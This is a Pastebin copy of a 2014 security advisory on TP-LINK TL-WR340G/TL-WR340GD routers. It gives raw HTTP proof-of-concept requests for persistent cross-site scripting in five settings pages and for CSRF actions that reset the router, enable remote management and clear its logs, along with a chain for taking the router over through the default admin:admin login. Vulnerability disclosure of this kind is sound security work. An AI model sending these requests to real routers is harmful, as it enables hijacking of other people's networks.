API tools faq
paste
Advertisement
Tr3v0r12345

TP-LINK Model No. TL-WR340G / TL-WR340GD - Multiple Vulnerab

Tr3v0r12345
Jul 4th, 2014
1,504
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.09 KB | None | 0 0
raw download clone embed print report
  1. #Title: TP-LINK Model No. TL-WR340G/TL-WR340GD - Multiple Vulnerabilities
  2. #Date: 01.07.14
  3. #Vendor: TP-LINK
  4. #Affected versions: TL-WR340G/TL-WR340GD
  5. #Tested on: Firmware Version - 4.3.7 Build 090901 Rel.61899n, Hardware Version - WR340G v5 081520C2 [at] Linux
  6. #Contact: smash [at] devilteam.pl
  7.  
  8. Persistent Cross Site Scripting vulnerabilities exists because of poor parameters filtration. Our value is stored in javascript array, since it's not correctly verified nor filtered, it is able to inject javascript code. It will be executed whenever user will visit specific settings page. Because of no CSRF prevention, it is able to compromise router. Attacker may force user to restore factory default settings, and then to turn on remote managment; in result, it will be able to log in using default username and password (admin:admin).
  9.  
  10. Config file - 192.168.1.1/userRpm/config.bin
  11.  
  12.  
  13. #1 - Cross Site Scripting
  14.  
  15.  
  16. a) Persistent XSS in Network > WAN Settings
  17.  
  18. Vulnerable parameter - hostName.
  19.  
  20. Request:
  21. GET /userRpm/WanDynamicIpCfgRpm.htm?wantype=Dynamic+IP&hostName=%3C/script%3E%3Cscript%3Ealert(123)%3C/script%3E&mtu=1500&Save=Save HTTP/1.1
  22. Host: 192.168.1.1
  23.  
  24. Response:
  25. HTTP/1.1 200 OK
  26. Server: Router
  27. Connection: close
  28. Content-Type: text/html
  29. WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
  30.  
  31. <SCRIPT language="javascript" type="text/javascript">
  32. var dhcpInf = new Array(
  33. 1,
  34. (...)
  35. "</script><script>alert(123)</script>",
  36. 0,0 );
  37. </SCRIPT>
  38. (...)
  39.  
  40.  
  41. b) Persitent XSS in Wireless Settings
  42.  
  43. Vulnerable parameter - ssid.
  44.  
  45. Request:
  46. GET /userRpm/WlanNetworkRpm.htm?ssid=%3C%2Fscript%3Exssed%3C%3E&region=102&channel=6&mode=2&ap=2&broadcast=2&secType=1&secOpt=3&keytype=1&key1=&length1=0&key2=&length2=0&key3=&length3=0&key4=&length4=0&Save=Save HTTP/1.1
  47. Host: 192.168.1.1
  48.  
  49. Response:
  50. HTTP/1.1 200 OK
  51. Server: Router
  52. Connection: close
  53. Content-Type: text/html
  54. WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
  55.  
  56. <SCRIPT language="javascript" type="text/javascript">
  57. var wlanPara = new Array(
  58. 5, 0, "</script>xssed<>", 114, 102, 1, 6, 2, 1, 1, 0, "", "", "", "", "", "", 0, 1, "333", 1, "11", 1, "0.0.0.0", 1812, "", "", 86400, 86400, 1,
  59. 0,0 );
  60. </SCRIPT>
  61. (...)
  62.  
  63.  
  64. c) Persistent XSS in DHCP Settings
  65.  
  66. Vulnerable parameter - domain.
  67.  
  68. Request:
  69. GET /userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=</script><xssed>'"&dnsserver=0.0.0.0&dnsserver2=0.0.0.0&Save=Save HTTP/1.1
  70. Host: 192.168.1.1
  71. Referer: http://192.168.1.1/userRpm/LanDhcpServerRpm.htm
  72.  
  73. Response:
  74. HTTP/1.1 200 OK
  75. Server: Router
  76. Connection: close
  77. Content-Type: text/html
  78. WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
  79.  
  80. <SCRIPT language="javascript" type="text/javascript">
  81. var DHCPPara = new Array(
  82. 1,
  83. "192.168.1.100",
  84. "192.168.1.199",
  85. 120,
  86. "0.0.0.0",
  87. "</script><xssed>'\"",
  88. "0.0.0.0",
  89. "0.0.0.0",
  90. 1,
  91. 1,
  92. 0,0 );
  93. </SCRIPT>
  94. (...)
  95.  
  96.  
  97. d) Persitent XSS in Security > Domain Filtering
  98.  
  99. Vulnerable parameter - domain; value is being validated by js to prevent illegal characters in domain name. It is able to avoid this filtration by sending raw http request.
  100.  
  101. Request:
  102. GET /userRpm/DomainFilterRpm.htm?begintime=0000&endtime=2400&domain=hm</script><xssed>'"&State=1&Changed=1&SelIndex=0&Page=1&Save=Save HTTP/1.1
  103. Host: 192.168.1.1
  104.  
  105. Response:
  106. HTTP/1.1 200 OK
  107. Server: Router
  108. Connection: close
  109. Content-Type: text/html
  110. WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
  111.  
  112. <SCRIPT language="javascript" type="text/javascript">
  113. var domainFilterList = new Array(
  114. "0000-2400", "hm</script><xssed>'\"", 1,
  115. 0,0 );
  116. </SCRIPT>
  117. (...)
  118.  
  119.  
  120. e) Persistent XSS in Dynamic DNS Settings
  121.  
  122. Vulnerable parameters - username & cliUrl.
  123.  
  124. Request:
  125. GET /userRpm/DynDdnsRpm.htm?provider=2&username=&pwd=&cliUrl=</script><script>alert(123)</script>&Save=Save HTTP/1.1
  126. Host: 192.168.1.1
  127.  
  128. Response:
  129. HTTP/1.1 200 OK
  130. Server: Router
  131. Connection: close
  132. Content-Type: text/html
  133. WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
  134.  
  135. <SCRIPT language="javascript" type="text/javascript">
  136. var serInf = new Array(
  137. "",
  138. "",
  139. "</script><script>alert(123)</script>",
  140. 0,
  141. 0,
  142. 2,
  143. 2,
  144. 0,
  145. 1,
  146. 0,0 );
  147. </SCRIPT>
  148. (...)
  149.  
  150.  
  151. #2 - CSRF
  152.  
  153.  
  154. a) Change LAN IP
  155.  
  156. Parameter lanip stands for further ip.
  157.  
  158. GET /userRpm/NetworkLanCfgRpm.htm?lanip=192.168.1.2&lanmask=255.255.255.0&Save=Save HTTP/1.1
  159. Host: 192.168.1.1
  160.  
  161.  
  162. b) Change remote managment settings
  163.  
  164. GET /userRpm/ManageControlRpm.htm?port=80&ip=0.0.0.0&Save=Save HTTP/1.1
  165. Host: 192.168.1.1
  166.  
  167.  
  168. c) Clear syslog
  169.  
  170. GET /userRpm/SystemLogRpm.htm?Clearlog=Clear+All HTTP/1.1
  171. Host: 192.168.1.1
  172.  
  173.  
  174. d) Reboot device
  175.  
  176. GET /userRpm/SysRebootRpm.htm?Reboot=Reboot HTTP/1.1
  177. Host: 192.168.1.1
  178.  
  179.  
  180. e) Restore factory defaults (admin:admin)
  181.  
  182. GET /userRpm/RestoreDefaultCfgRpm.htm?Restorefactory=Restore HTTP/1.1
  183. Host: 192.168.1
  184.  
  185. # 2CCC9E6E50C8205C 1337day.com [2014-07-05] A550E4FFAFA05238 #
  186.  
  187.  
  188. Description:
  189. TP-LINK Model No. TL-WR340G & TL-WR340GD suffers on multiple persistent cross site scripting and cross site request forgery vulnerabilities.
  190.  
  191. Persistent Cross Site Scripting vulnerabilities exists because of poor parameters filtration. Our value is stored in javascript array, since it's not correctly verified nor filtered, it is able to inject javascript code. It will be executed whenever user will visit specific settings page. Because of no CSRF prevention, it is able to compromise router. Attacker may force user to restore factory default settings, and then to turn on remote managment; in result, it will be able to log in using default username and password credentials(admin:admin).
  192.  
  193.  
  194.  
  195.  
  196.  
  197.  
  198.  
  199.  
  200. Full title TP-LINK Model No. TL-WR340G / TL-WR340GD - Multiple Vulnerabilities
  201. Date add 2014-07-02
  202. Category web applications
  203. Platform hardware
  204. Risk <font color="#FFBF00">Security Risk High</font>
  205. Vendor tplink.com
  206. Affected ver TL-WR340G & TL-WR340GD
  207. Tested on Firmware Version - 4.3.7 Build 090901 Rel.61899n, Hardware Version - WR340G v5 081520C2 [at] Linux
  208. Solution CSRF prevention mechanism and solid parameters filtration.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!